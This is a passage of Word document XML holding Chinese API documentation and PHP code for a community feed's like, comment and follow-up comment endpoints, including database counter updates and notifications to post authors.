    <w:p w14:paraId="06100E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31197E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3A225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'zan_num' =&gt; $article['zan_num'] + 1,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="535AB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'cai_num' =&gt; $article['cai_num'] - 1,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B496C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DB82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】已点赞您所发布的动态</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="421C6F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$article['member_id'], $content, '', '', '', $article_id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57F33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7AEB1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73ED57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733141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B612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E693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AC824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1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B3F83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$data['cai'] = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EA004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1BC7F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$circle_article_zan_id = Db::name('circle_article_zan')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6091AE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4FCE6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($circle_article_zan_id) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C9D69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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DD5EC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12CE88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-&gt;setInc('zan_num');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1860B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】已点赞您所发布的动态</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50E50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$article['member_id'], $content, '', '', '', $article_id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E515F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2C7B7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12CE62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129934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74C9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678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FD2C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38E4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573B9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该社区动态不存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43B03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59A558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381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F6E6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06D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BF3F7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用户点赞失败</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69785C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9735A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6195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FC1FF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7FB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/api/circle/article_ping </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>评论社区动态</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D9FD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评论社区动态</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68AB13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60683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2E840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62F677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（必填）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="244D7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评论内容（必填）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B6E0D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用户发表评论成功</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="580DA1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用户发表评论失败</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DFC2D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6E7755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211C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article_ping()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58431F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2B98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D9530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5F7672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E17D5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3727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请先登录账号，然后评论社区动态</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68929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B48EF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1BE3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F16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input('param.content', '');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49316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($content == '') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="086F9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B0975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评论内容不可为空</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74E3CD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2562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0495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D7A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25DB5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6AAAF3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B569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0315D9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84C2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2002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01A8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45148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408B03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01707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7E8DC5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$data['article_id'] = $article_id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FECC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$content;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AF1C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$data['zan_num'] = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0895B9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$data['ping_xia_num'] = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7300F8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075725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$circle_article_ping_id = Db::name('circle_article_ping')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="354762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0E8FBE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($circle_article_ping_id) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B85A1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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="108C48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70C616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-&gt;setInc('ping_num');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A5C77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】已评论您所发布的动态</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="486B71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$article['member_id'], $content, '', '', '', $article_id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CFF1F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2631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用户发表评论成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DEDBC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533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F9FD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C728B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16DE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该社区动态不存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="714192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7B8AEE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E8D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032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7F66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D891A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用户发表评论失败</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FC57F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6C7E5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AE0F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9AA2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4E65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/api/circle/article_ping_zan </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>点赞｜取消点赞动态评论</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26A76E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点赞｜取消点赞动态评论</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="004C2D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5764E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6B95F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3099F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ping_id     </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>动态评论</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>（必填）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CBA5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用户点赞｜取消点赞成功</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32F02C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已点赞；</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>0-</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>已取消点赞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42EEEF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用户点赞失败</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="636AEE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183C52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34E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article_ping_zan()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="521B3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D2F8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08A9C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709CC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9A978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58D6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请先登录账号，然后点赞动态评论</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C7471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3A21C2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1DA3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19C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$ping_id = input('param.ping_id', '');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70E49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($ping_id == '') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D37B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EA0E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动态评论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2A4576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5E6C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508B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A0B1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 = Db::name('circle_article_ping')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26F44D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055C77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768C2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(!empty($ping)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18E862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$data['ping_id'] = $ping_id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="261C9D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$circle_article_ping_zan = Db::name('circle_article_ping_zan')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32CEFC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49BB13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8EBA9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(!empty($circle_article_ping_zan)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73DCFE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($circle_article_ping_zan['zan'] == 1) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="002C9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Db::name('circle_article_ping_zan')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="499497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6479DF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328E03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0D187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7FBD31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1D58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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38E16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395665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-&gt;setDec('zan_num');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="427EF2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】已取消点赞您所发布的动态评论</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B2AE1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$ping['member_id'], $content, '', '', '', $ping['article_id']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="571188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6BC2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用户取消点赞成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AAB05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5E0F04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2AA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C830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Db::name('circle_article_ping_zan')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AEF03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2E5F3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163C4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21414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618F06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0189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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2102DA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059810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-&gt;setInc('zan_num');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35BAEA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】已点赞您所发布的动态评论</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EBE81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$ping['member_id'], $content, '', '', '', $ping['article_id']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D8290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4EFAF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1A3882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04F13E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0A0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E5E2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023AC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1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13A41C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19F0AD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$circle_article_ping_zan_id = Db::name('circle_article_ping_zan')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="412B8C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3EB582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($circle_article_ping_zan_id) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5459DF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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16E6B3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2B78BD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-&gt;setInc('zan_num');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52022A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】已点赞您所发布的动态评论</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="382EFF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$ping['member_id'], $content, '', '', '', $ping['article_id']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E093C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351C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336F4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4FCFF0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522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B3CD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E5F6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13092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F7DC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该动态评论不存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="078C34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28B905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0B1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61A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B771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69937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用户点赞失败</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EF05D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64703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705B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8524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CC2E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/api/circle/article_ping_xia </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>追评社区动态</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34256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追评社区动态</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A6AB1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0A194E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7E79B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B50F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（必填）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B999C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ping_id     </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>动态评论</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>（必填）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F10D3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追评内容（必填）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23838B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用户追评成功</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0882A8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用户追评失败</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1797D4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36D27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A6C8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article_ping_xia()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="705E0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10E0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3C80E7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384241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0D61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FCB0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请先登录账号，然后追评社区动态</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79F02A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0DA67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2E5F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0E1B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input('param.content', '');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B47A2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($content == '') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0630B6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5D25A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追评内容不可为空</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41F8B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7D658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A776E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DC31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24532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2543A4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F053C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76EC2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5DB0F1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3E46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8122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2C6C2E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4D3B4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7666A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5C1483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$ping_id = input('param.ping_id', '');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A02B5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($ping_id == '') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74FFA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E7663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动态评论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6ECC6E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3B5CD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93C9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0A79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 = Db::name('circle_article_ping')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58508D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25454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CDD8F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(!empty($ping)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AC4C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$data['article_id'] = $article_id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A9290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$data['ping_id'] = $ping_id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23BB30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$content;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F41E5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$data['zan_num'] = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E0FBC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3CD053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$circle_article_ping_xia_id = Db::name('circle_article_ping_xia')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F1789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6508DB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($circle_article_ping_xia_id) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FC981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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="107739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$ping_id)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48F008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-&gt;setInc('ping_xia_num');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B7440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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75E184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67A380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-&gt;setInc('ping_num');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0680D7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】已追评您所发布的动态评论</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17C85C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$ping['member_id'], $content, '', '', '', $article_id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C966D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1E32A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用户追评成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72E422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1F0D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555C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CCFA6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523A8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该动态评论不存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03F60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0F88F0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6F90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A0FF8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B95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D459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0B754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该社区动态不存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="543643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40CE73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2FE0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C204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328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8E5F5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用户追评失败</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48F5E5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C728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F83B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117B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B99B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/api/circle/article_ping_xia_zan </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>点赞｜取消点赞动态追评</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="139179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点赞｜取消点赞动态追评</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EFFE6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4A47D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08C5F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6437C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ping_xia_id  </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>动态追评</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>（必填）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B6247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用户点赞｜取消点赞成功</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="144BE6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zan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已点赞；</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>0-</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>已取消点赞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ED6D2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用户点赞失败</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="525971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4C5C62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3306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article_ping_xia_zan()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33867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B928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254CE2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$data['member_id'] = $this-&gt;memberId;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11AA71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2D96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A7493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请先登录账号，然后点赞动态追评</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65471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729BF6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3C6C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27D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$ping_xia_id = input('param.ping_xia_id', '');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D2653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($ping_xia_id == '') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="426508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90A1C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动态追评</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53E5E4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57E92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D758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7682E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$ping_xia = Db::name('circle_article_ping_xia')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42D1B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$ping_xia_id)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02B0E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7F394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(!empty($ping_xia)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="368B5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$data['ping_xia_id'] = $ping_xia_id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A37E5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$circle_article_ping_xia_zan = Db::name('circle_article_ping_xia_zan')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D7469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25F8CE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51C6C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(!empty($circle_article_ping_xia_zan)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E85EA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($circle_article_ping_xia_zan['zan'] == 1) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3274CE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Db::name('circle_article_ping_xia_zan')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="462414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7137C9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044337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21B1E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406257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C2C6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Db::name('circle_article_ping_xia')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26554E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$ping_xia_id)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31BB1C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-&gt;setDec('zan_num');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="724EAF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】已取消点赞您所发布的动态追评</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FB99A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$ping_xia['member_id'], $content, '', '', '', $ping_xia['article_id']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E5B29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A6245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用户取消点赞成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17059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0,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BD855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46B6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4E241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Db::name('circle_article_ping_xia_zan')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36F230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044236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7B416F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1854A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'create_time' =&gt; time(),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0326B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464A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Db::name('circle_article_ping_xia')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23A49E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$ping_xia_id)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D67B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-&gt;setInc('zan_num');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EE042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】已点赞您所发布的动态追评</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C5BD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$ping_xia['member_id'], $content, '', '', '', $ping_xia['article_id']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A1271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0A720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1692BF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16C1A3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99C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BDE8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3872C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1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13D403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479719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$circle_article_ping_xia_zan_id = Db::name('circle_article_ping_xia_zan')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AAE6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5FFA78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($circle_article_ping_xia_zan_id) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26E01F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Db::name('circle_article_ping_xia')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F2BE9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$ping_xia_id)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52A86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-&gt;setInc('zan_num');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22993B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】已点赞您所发布的动态追评</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B7C3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$ping_xia['member_id'], $content, '', '', '', $ping_xia['article_id']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17044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1A19CB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用户点赞成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A9717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=&gt; 1,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="417C3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5BA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5EF2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8C16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03FF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06DF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该动态追评不存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45E70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4B7C7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6B5A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70F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A102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1E5F7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用户点赞失败</w:t>
      </w:r>
